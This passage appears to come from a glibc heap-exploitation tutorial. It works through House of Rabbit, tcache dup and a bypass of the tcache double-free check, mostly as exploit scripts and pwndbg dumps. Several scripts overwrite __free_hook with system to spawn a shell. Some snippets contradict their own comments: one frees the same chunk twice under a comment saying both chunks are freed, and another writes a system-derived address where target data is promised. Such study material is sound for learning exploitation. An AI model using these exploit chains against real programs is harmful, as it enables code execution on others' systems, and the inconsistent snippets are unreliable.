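The adjustment can be sketched with the values from this session (initial threshold 0x20000, freed mmapped chunk of 0x61000); DEFAULT_MMAP_THRESHOLD_MAX here is the 64-bit default of 32 MiB:

```python
# Sketch of the dynamic threshold bump from the free() path above.
DEFAULT_MMAP_THRESHOLD_MAX = 32 * 1024 * 1024   # 64-bit default
mmap_threshold = 0x20000                        # initial mp_.mmap_threshold
freed_chunk = 0x61000                           # chunksize of very_big

if mmap_threshold < freed_chunk <= DEFAULT_MMAP_THRESHOLD_MAX:
    mmap_threshold = freed_chunk                # mp_.mmap_threshold = chunksize (p)

print(hex(mmap_threshold))
# The next malloc(0x5fff8) now falls below the threshold, so it is
# served from the main heap via sbrk, growing av->system_mem.
```

This is why the script does malloc, free, malloc with the same size: the first call gets mmapped, the free bumps the threshold, and the second call lands on the real heap.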
Updating our exploit code:
# Get more memory in our heap.
very_big = malloc(0x5fff8, b"Z"*8) # surpass the mmap threshold
free(very_big) # Unmap it, and adjust the threshold.
very_big = malloc(0x5fff8, b"Z"*8) # Allocate from heap, increasing the system_mem value.
Now we can see the threshold increased.
pwndbg> p/x mp_
$2 = {
trim_threshold = 0xc2000,
top_pad = 0x20000,
mmap_threshold = 0x61000,
arena_test = 0x8,
arena_max = 0x0,
n_mmaps = 0x1,
n_mmaps_max = 0x10000,
max_n_mmaps = 0x1,
no_dyn_threshold = 0x0,
mmapped_mem = 0x81000,
max_mmapped_mem = 0x81000,
sbrk_base = 0x21d7c000
}
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x21d7c000
Size: 0x60000 (with flag bits: 0x60001)
Top chunk | PREV_INUSE
Addr: 0x21ddc000
Size: 0x21000 (with flag bits: 0x21001)
And finally our fake chunk has been linked into the largebins under “user”.
largebins
0x80000-∞: 0x602040 (user) —▸ 0x7f365c798328 (main_arena+2088) ◂— 0x602040 /* '@ `' */
And we finish off our exploit code with a basic House of Force-style primitive.
age = 1
io.sendafter(b"age: ", f"{age}".encode())
io.recvuntil(b"> ")
# Get more memory in our heap.
very_big = malloc(0x5fff8, b"Z"*8) # surpass the mmap threshold
free(very_big) # Unmap it, and adjust the threshold.
very_big = malloc(0x5fff8, b"Z"*8) # Allocate from heap, increasing the system_mem value.
# Request 2 fast chunks.
fast_A = malloc(24, b"A"*8)
fast_B = malloc(24, b"B"*8)
#Fastbin dup
free(fast_A)
free(fast_B)
free(fast_A) # Double free
# Link the fake chunk; the "age" field becomes its size field.
fast_A = malloc(24, p64(elf.sym.user))
# Get our fake chunk into the unsorted bin through free() (malloc_consolidate).
malloc_consolidate = malloc(0x88, b"A"*8)
free(malloc_consolidate)
# Now get into the largest large bin
amend_age(0x80001)
malloc(0x80008, b"D"*8)
# wrap around the VA space.
# thus no more sanity checks.
# House of Force-style primitive.
amend_age(0xfffffffffffffff1)
distance = delta(elf.sym.user, elf.sym.target - 0x20)
malloc(distance, b"E"*8)
malloc(24,b"Pwned!\0")
Code Execution
We go after __free_hook. The size left in the fake chunk is so large that the remaindering causes errors, so we change the size back to what we need.
pwndbg> u __free_hook
0x7f642c6400d0 <system> test rdi, rdi
0x7f642c6400d3 <system+3> je system+16 <system+16>
[ ... ]
# Now get into the largest large bin
amend_age(0x80001)
malloc(0x80008, b"D"*8)
# Change here
distance = (libc.sym.__free_hook - 0x20) - elf.sym.user
# wrap around the VA space.
# thus no more sanity checks.
# House of Force-style primitive.
amend_age(distance + 0x29)
# for the free()
shell = malloc(distance, b"/bin/sh\0")
malloc(24,p64(0) + p64(libc.sym.system))
free (shell)
io.interactive()
Takeaways // what we did
- Double free to link a fake chunk into the fastbins.
- malloc_consolidate: fastbins -> unsorted bin.
- 2a. By freeing a normal chunk bordering the top chunk.
- Set the PREV_INUSE flag and the size to 0.
- 3a. Making its next and next-next chunk point to itself.
- Once in the unsorted bin, changed the size field to 0x60000.
- 4a. Passed the unsorted bin size check by increasing system_mem.
- 4b. Using the mmap threshold increase.
- Now it's in the largebin, and changed its size to the largest possible value.
- 5a. Allocation from the fake chunk reaches the target data.
- Allocate to overwrite the data.
Heap Feng Shui
How we can manipulate the heap in our favour. House of Rabbit again, but what if we can't request fastbin sizes? A double free only needs a valid size field, and free can be called on an arbitrary address.
We use a dangling pointer. How can we make a fastbin-sized chunk? Remaindering, of course!
Goal: have a dangling pointer point to a fake fastbin chunk.
0x13b25000 0x0000000000000000 0x0000000000000091 ................
0x13b25010 0x4545454545454545 0x00007f8c57b97bf8 EEEEEEEE.{.W....
0x13b25020 0x0000000000000000 0x0000000000000000 ................
0x13b25030 0x0000000000000000 0x0000000000000000 ................
0x13b25040 0x0000000000000000 0x0000000000000000 ................
0x13b25050 0x0000000000000000 0x0000000000000000 ................
0x13b25060 0x0000000000000000 0x0000000000000000 ................
0x13b25070 0x0000000000000000 0x0000000000000000 ................
0x13b25080 0x0000000000000000 0x0000000000000000 ................
0x13b25090 0x0000000000000090 A[ 0x0000000000000021 ........!....... <-- fastbins[0x20][0], unsortedbin[all][0]
0x13b250a0 0x00007f8c57b97b58 0x00007f8c57b97b58 X{.W....X{.W....
0x13b250b0 0x0000000000000020 ] 0x0000000000000090 ...............
0x13b250c0 0x4444444444444444 0x0000000000000000 DDDDDDDD........
0x13b250d0 0x0000000000000000 0x0000000000000000 ................
0x13b250e0 0x0000000000000000 0x0000000000000000 ................
0x13b250f0 0x0000000000000000 0x0000000000000000 ................
0x13b25100 0x0000000000000000 0x0000000000000000 ................
0x13b25110 0x0000000000000000 0x0000000000000000 ................
0x13b25120 0x0000000000000000 0x0000000000020ee1 ................
0x13b25130 0x0000000000000000 0x0000000000000000 ................
0x13b25140 0x0000000000000000 0x0000000000020ec1 ................ <-- Top chunk
Python to get to this state:
# Request 2 normal chunks.
chunk_A = malloc(0x88, b"A"*8)
dangling_pointer = malloc(0x88, b"B"*8)
# Free both; they coalesce into a single 0x120 unsorted chunk.
free(chunk_A)
free(chunk_A)
# Remainder the coalesced chunk, then free the resulting 0xb0 chunk.
chunk_B = malloc(0xa8, b"C"*8)
chunk_C = malloc(0x88, b"D"*8)
free(chunk_B)
# Splitting the freed 0xb0 chunk leaves a 0x20 remainder exactly where
# dangling_pointer still points: a fake fastbin-sized chunk.
chunk_E = malloc(0x88, b"E"*8)
free(chunk_E)
# to be continued…
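The splitting arithmetic above can be sketched as a toy model (my own helper names and simplified rounding, not glibc code): carving a 0x90 chunk out of the freed 0xb0 chunk leaves exactly a MINSIZE (0x20) remainder.

```python
# Toy model of glibc chunk rounding and remaindering (assumes x86-64:
# 0x10 alignment, 8-byte size-field overlap, MINSIZE = 0x20).
MINSIZE = 0x20

def chunk_size(request):
    """Round a malloc request up to its real chunk size."""
    return max(MINSIZE, (request + 8 + 0xF) & ~0xF)

def split(free_chunk, request):
    """Split a free chunk; return (allocated size, remainder size)."""
    need = chunk_size(request)
    assert free_chunk - need >= MINSIZE, "remainder would be below MINSIZE"
    return need, free_chunk - need

# Two coalesced 0x90 chunks form a 0x120 free chunk;
# the 0xa8 request carves a 0xb0 chunk out of it.
print([hex(v) for v in split(0x120, 0xa8)])  # ['0xb0', '0x70']

# Freeing the 0xb0 chunk and requesting 0x88 leaves a 0x20 remainder:
# a fastbin-sized chunk sitting exactly where the dangling pointer points.
print([hex(v) for v in split(0xb0, 0x88)])   # ['0x90', '0x20']
```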
Tcache (libc 2.27 and later)
Thread cache. Weirdly, it makes exploitation easier by bypassing several mitigations.
The tcache struct lives inline in heap memory, at the start of the heap:
size = 0x251
counts = [1, 1, …]
entries = [0x20, 0x10, …, 0x410]
Entries point to the USER DATA rather than the metadata.
counts keeps a running tally of the chunks in each bin; it's a single byte per bin (2 bytes from 2.30 onward).
New entries are inserted at the head of the list (LIFO).
[ ENTRIES ] => [CHUNK A (USERDATA)] => 0x00
// FREE CHUNK B
[ ENTRIES ] => [CHUNK B (USERDATA)] => [CHUNK A (USERDATA)] => 0x00
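The diagram above can be modelled as a tiny LIFO linked list (a toy model with made-up names, not the real glibc structures):

```python
# Toy model of one tcache bin: a singly linked LIFO list of user-data
# pointers plus a per-bin counter (hypothetical names, not glibc code).
class TcacheBin:
    def __init__(self):
        self.entry = None   # entries[] slot: head of the list
        self.count = 0      # counts[] slot: 1 byte (2 bytes from 2.30)

    def put(self, chunk):            # the free() path
        chunk["next"] = self.entry   # fd is written into the chunk's USER DATA
        self.entry = chunk
        self.count += 1

    def get(self):                   # the malloc() path
        chunk = self.entry
        self.entry = chunk["next"]
        self.count -= 1
        return chunk

bin_0x20 = TcacheBin()
chunk_A = {"name": "A", "next": None}
chunk_B = {"name": "B", "next": None}
bin_0x20.put(chunk_A)   # [ ENTRIES ] => A => 0x00
bin_0x20.put(chunk_B)   # [ ENTRIES ] => B => A => 0x00
print(bin_0x20.get()["name"])  # B (freed last, allocated first)
print(bin_0x20.get()["name"])  # A
```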
Takeaways
- tcache is a miniature arena
- Acts exactly like the fastbins
- Takes precedence over the regular arena
Tcache Dup
The tcache dup technique is the tcache counterpart of fastbin duplication: a double free that triggers no immediate crash or abort.
In the dump below, tcachebins[]
shows duplicate entries for the same chunk: it has been freed twice, but the heap manager doesn't treat this as a double free.
0x603000 0x0000000000000000 0x0000000000000251 ........Q.......
0x603010 0x0000000000000003 0x0000000000000000 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000603260 0x0000000000000000 `2`.............
0x603060 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x603240 0x0000000000000000 0x0000000000000000 ................
0x603250 0x0000000000000000 0x0000000000000021 ........!.......
0x603260 0x0000000000603280 0x0000000000000000 .2`............. <-- tcachebins[0x20][0/3], tcachebins[0x20][0/3]
0x603270 0x0000000000000000 0x0000000000000021 ........!.......
0x603280 0x0000000000603260 0x0000000000000000 `2`............. <-- tcachebins[0x20][1/3]
0x603290 0x0000000000000000 0x0000000000020d71 ........q....... <-- Top chunk
The same chunk can even be freed twice in direct succession; no double-free check fires, and its fd ends up pointing to itself.
0x603000 0x0000000000000000 0x0000000000000251 ........Q.......
0x603010 0x0000000000000002 0x0000000000000000 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000603260 0x0000000000000000 `2`.............
[ ... ]
0x603250 0x0000000000000000 0x0000000000000021 ........!.......
0x603260 0x0000000000603260 0x0000000000000000 `2`............. <-- tcachebins[0x20][0/2], tcachebins[0x20][0/2]
0x603270 0x0000000000000000 0x0000000000020d91 ................ <-- Top chunk
With a duplicated tcache entry, planting a fake fd turns the dup into an arbitrary write. Here's a Python example that overwrites target data using the tcache duplication technique.
# Request a minimum-sized chunk and write data into it.
chunk_A = malloc(24, b"A"*8)
# Double-free chunk A; the tcachebin is now A -> A.
free(chunk_A)
free(chunk_A)
chunk_B = malloc(24, p64(elf.sym.target)) # Overwrite A's fd with the target address
chunk_C = malloc(24, b"A"*8)              # Pops A again; the fake chunk is now at the head
write = malloc(24, b"pwned!\0")           # Allocation lands on target; overwrite its data
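The pointer flow of this dup can be sketched with a toy allocator: "memory" is a dict of qwords, and the pre-2.29 free path does no double-free check (all names and addresses here are made up for illustration):

```python
# Toy model of the tcache dup primitive (pre-2.29 free path: no key check).
memory = {}   # fake heap: address -> first qword of user data (the fd field)
head = None   # tcachebins[0x20] entry

def tc_free(addr):          # no double-free detection
    global head
    memory[addr] = head or 0
    head = addr

def tc_malloc(write=None):  # pop the head, then write attacker data into it
    global head
    addr = head
    head = memory.get(addr) or None
    if write is not None:
        memory[addr] = write
    return addr

chunk_A = 0x603260          # hypothetical chunk address
tc_free(chunk_A)
tc_free(chunk_A)            # tcache: A -> A, no abort

target = 0x602010           # hypothetical address of the target data
tc_malloc(write=target)     # pops A, plants the fake fd
tc_malloc()                 # pops A again; the fake chunk is now the head
print(hex(tc_malloc()))     # 0x602010: the next allocation IS the target
```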
Code Execution
As usual, just overwrite a hook.
# Request a minimum-sized chunk and write data into it.
chunk_A = malloc(24, b"A"*8)
# Double-free chunk A.
free(chunk_A)
free(chunk_A)
malloc(24, p64(libc.sym.__free_hook)) # Overwrite A's fd with the address of __free_hook
binsh = malloc(24, b"/bin/sh\0")      # Pops A again; __free_hook is now at the head
malloc(24, p64(libc.sym.system))      # Allocation lands on __free_hook; overwrite it with system
free(chunk_A)                         # chunk_A == binsh, so this calls system("/bin/sh")
io.interactive()
Takeaways
- Incredibly Simple: This technique is remarkably easy to execute and bypasses almost all mitigations.
- No Double-Free Mitigation: The system does not properly handle double-free vulnerabilities.
- No Size Field Check: There is no check for the size field, making it easier to manipulate memory.
- Count Field: The count field isn’t used to track available chunks, further simplifying exploitation.
Tcache Dumping (libc 2.31)
Tcache dumping: when the tcache bin is full, subsequently freed chunks fall through to the fastbins/unsorted bin. Allocations are served from the tcache first, then from the fastbins/unsorted bin; when an allocation is served from a fastbin and the matching tcachebin has room, the remaining fastbin chunks are "dumped" into the tcache until it is full again.
Freeing 14 chunks of the same size, for example, results in half of them landing in the tcachebins
and the other half in the fastbins
.
0x602000 0x0000000000000000 0x0000000000000291 ................
0x602010 0x0000000000000007 0x0000000000000000 ................
0x602020 0x0000000000000000 0x0000000000000000 ................
0x602030 0x0000000000000000 0x0000000000000000 ................
0x602040 0x0000000000000000 0x0000000000000000 ................
0x602050 0x0000000000000000 0x0000000000000000 ................
0x602060 0x0000000000000000 0x0000000000000000 ................
0x602070 0x0000000000000000 0x0000000000000000 ................
0x602080 0x0000000000000000 0x0000000000000000 ................
0x602090 0x0000000000602360 0x0000000000000000 `#`.............
[ ... ]
0x602290 0x0000000000000000 0x0000000000000021 ........!.......
0x6022a0 0x0000000000000000 0x0000000000602010 ......... `..... <-- tcachebins[0x20][6/7]
0x6022b0 0x0000000000000000 0x0000000000000021 ........!.......
0x6022c0 0x00000000006022a0 0x0000000000602010 ."`...... `..... <-- tcachebins[0x20][5/7]
0x6022d0 0x0000000000000000 0x0000000000000021 ........!.......
0x6022e0 0x00000000006022c0 0x0000000000602010 ."`...... `..... <-- tcachebins[0x20][4/7]
0x6022f0 0x0000000000000000 0x0000000000000021 ........!.......
0x602300 0x00000000006022e0 0x0000000000602010 ."`...... `..... <-- tcachebins[0x20][3/7]
0x602310 0x0000000000000000 0x0000000000000021 ........!.......
0x602320 0x0000000000602300 0x0000000000602010 .#`...... `..... <-- tcachebins[0x20][2/7]
0x602330 0x0000000000000000 0x0000000000000021 ........!.......
0x602340 0x0000000000602320 0x0000000000602010 #`...... `..... <-- tcachebins[0x20][1/7]
0x602350 0x0000000000000000 0x0000000000000021 ........!.......
0x602360 0x0000000000602340 0x0000000000602010 @#`...... `..... <-- tcachebins[0x20][0/7]
0x602370 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][6]
0x602380 0x0000000000000000 0x0000000000000000 ................
0x602390 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][5]
0x6023a0 0x0000000000602370 0x0000000000000000 p#`.............
0x6023b0 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][4]
0x6023c0 0x0000000000602390 0x0000000000000000 .#`.............
0x6023d0 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][3]
0x6023e0 0x00000000006023b0 0x0000000000000000 .#`.............
0x6023f0 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][2]
0x602400 0x00000000006023d0 0x0000000000000000 .#`.............
0x602410 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][1]
0x602420 0x00000000006023f0 0x0000000000000000 .#`.............
0x602430 0x0000000000000000 0x0000000000000021 ........!....... <-- fastbins[0x20][0]
0x602440 0x0000000000602410 0x0000000000000000 .$`.............
0x602450 0x0000000000000000 0x0000000000020bb1 ................ <-- Top chunk
The max limit is 7 chunks per bin; this value is held in the mp_
struct.
mp_ struct at: 0x7ffff7bb5280
{
trim_threshold = 131072,
top_pad = 131072,
mmap_threshold = 131072,
arena_test = 8,
arena_max = 0,
n_mmaps = 0,
n_mmaps_max = 65536,
max_n_mmaps = 0,
no_dyn_threshold = 0,
mmapped_mem = 0,
max_mmapped_mem = 0,
sbrk_base = 0x602000,
tcache_bins = 64,
tcache_max_bytes = 1032,
tcache_count = 7, <--- Here
tcache_unsorted_limit = 0,
}
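With tcache_count = 7 from the mp_ struct, the free/malloc routing described above can be sketched as a toy model (my own helper names, not glibc code):

```python
# Toy model of free()/malloc() routing for one fastbin-sized bin
# when the tcache fills up (libc 2.26+; simplified, not glibc code).
TCACHE_COUNT = 7
tcache, fastbin = [], []   # index 0 is the head of each list

def toy_free(addr):
    if len(tcache) < TCACHE_COUNT:
        tcache.insert(0, addr)    # tcache takes precedence, LIFO
    else:
        fastbin.insert(0, addr)   # overflow falls through to the fastbin

def toy_malloc():
    if tcache:
        return tcache.pop(0)
    addr = fastbin.pop(0)         # serve the fastbin head...
    while fastbin and len(tcache) < TCACHE_COUNT:
        tcache.insert(0, fastbin.pop(0))   # ...and dump the rest into tcache
    return addr

# Free 14 same-sized chunks: 7 land in the tcache, the other 7 in the fastbin.
for addr in range(14):
    toy_free(addr)
print(len(tcache), len(fastbin))  # 7 7

# Empty the tcache, then allocate once more: the fastbin head is served and
# the 6 remaining fastbin chunks are dumped into the tcache.
for _ in range(7):
    toy_malloc()
toy_malloc()
print(len(tcache), len(fastbin))  # 6 0
```

This matches the pwndbg output below: after one allocation from the fastbins, 6 chunks appear in the tcachebin.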
Fun fact: calloc
doesn't allocate from the tcache
.
Now to see it in action:
pwndbg> bins
tcachebins
empty
fastbins
0x20: 0x602430 —▸ 0x602410 —▸ 0x6023f0 —▸ 0x6023d0 —▸ 0x6023b0 —▸ 0x602390 —▸ 0x602370 ◂— 0
*Allocation*
pwndbg> bins
tcachebins
0x20 [ 6]: 0x602380 —▸ 0x6023a0 —▸ 0x6023c0 —▸ 0x6023e0 —▸ 0x602400 —▸ 0x602420 ◂— 0
fastbins
empty
Practice (Bypassing Double-free mitigation)
What mitigation was implemented?
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
What is e->key
?
[ ... ]
0x603290 0x0000000000000000 0x0000000000000021 ........!.......
0x6032a0 0x0000000000000000 0x0000000000603010 .........0`..... <-- tcachebins[0x20][1/2]
0x6032b0 0x0000000000000000 0x0000000000000021 ........!.......
0x6032c0 0x00000000006032a0 0x0000000000603010 .2`......0`..... <-- tcachebins[0x20][0/2]
0x6032d0 0x0000000000000000 0x0000000000020d31 ........1....... <-- Top chunk
The freed chunks now hold a new value in what would be the "bk" field: both point at the tcache struct. This is the "key"
field.
If a chunk's key field points to the tcache, free takes it as a hint that the chunk may already be free:
the detection logic kicks in, iterating over every chunk in the tcachebin, and if the chunk is found there, the program aborts.
This kills the straightforward tcache dup.
How do we get around this?
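The key insight can be sketched as a toy model (hypothetical names; the real check lives in glibc's tcache free path): the check only fires while the key field still holds the tcache address, so any write that clobbers the key, or a free path that never sets it (like the fastbin path), re-enables the dup.

```python
# Toy model of the libc 2.29 key-based double-free check.
TCACHE = object()   # stands in for the address of the tcache struct

class Chunk:
    def __init__(self):
        self.next = None   # fd field (first qword of user data)
        self.key = None    # second qword of user data

entries = []           # one tcachebin

def tc_free(e):
    if e.key is TCACHE:           # fast hint: chunk may already be free...
        if e in entries:          # ...so walk the bin to confirm
            raise RuntimeError("free(): double free detected in tcache 2")
    e.key = TCACHE
    entries.insert(0, e)

chunk = Chunk()
tc_free(chunk)
try:
    tc_free(chunk)                # straight double free: caught
except RuntimeError as err:
    print(err)

# If the key is clobbered before the second free (e.g. the chunk was
# reallocated, or was freed into a fastbin where the key is never set),
# the hint is gone and the chunk is linked twice.
chunk.key = 0x5a5a5a5a5a5a5a5a
tc_free(chunk)
print(entries.count(chunk))       # 2
```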
Step-by-Step Exploitation
- Fill the 0x20 tcachebin: 7 frees of same-sized chunks.
- Free the duplicate chunk: with the tcache full, it falls through to the fastbin, and its key field is never set.
- Empty the tcache: 7 allocations.
- Free the duplicate chunk again: the key check passes, so it lands in the tcache.
- The chunk is now present in both the fastbin and the tcache; this is the step that enables the dup.
- Allocate it from the tcache and plant a fake fd; the follow-on fastbin dumping links it into the tcache a second time with the fake fd intact.
- Allocate again to pop the duplicate off the poisoned list.
- The final allocation returns the fake chunk: overwrite the target data, achieving an arbitrary memory write.
# Request 7 0x20-sized chunks, plus the chunk to double-free.
fillers = [malloc(24, b"Filler") for n in range(7)]
dup = malloc(24, b"Y"*8)
# Fill the 0x20 tcachebin.
for chunk in fillers:
    free(chunk)
free(dup)  # Tcache is full: dup goes into the fastbin
# Empty the tcache.
fillers = [malloc(24, b"Filler") for n in range(7)]
free(dup)  # dup's key was never set: it now also lands in the tcache
# The chunk is in both the tcache and the fastbin.
# Allocation pops dup from the tcache, and fastbin dumping re-links it.
malloc(24, p64(libc.sym.system - 0x18))
malloc(24, b"Y"*8)
malloc(24, b"b"*8 + b"Pwned!\0")
io.interactive()
Code Execution
- Change the target.
# Request 7 0x20-sized chunks, plus the chunk to double-free.
fillers = [malloc(24, b"Filler") for n in range(7)]
dup = malloc(24, b"Y"*8)
# Fill the 0x20 tcachebin.
for chunk in fillers:
    free(chunk)
free(dup)  # Tcache is full: dup goes into the fastbin
# Empty the tcache.
fillers = [malloc(24, b"Filler") for n in range(7)]
free(dup)  # dup's key was never set: it now also lands in the tcache
# The chunk is in both the tcache and the fastbin.
# Allocation pops dup from the tcache, and fastbin dumping re-links it.
malloc(24, p64(libc.sym.__free_hook - 16))
binsh = malloc(24, b"/bin/sh\0")
malloc(24, p64(libc.sym.system))
free(binsh)
io.interactive()
Side Notes!
mallopt
can be used to control malloc internals. M_MMAP_THRESHOLD
only takes effect once malloc
has been initialized.
To inspect the GLIBC_TUNABLES
entries in gdb, p tunable_list[21]
can be used. Importantly, tcache_count
sits at index 21.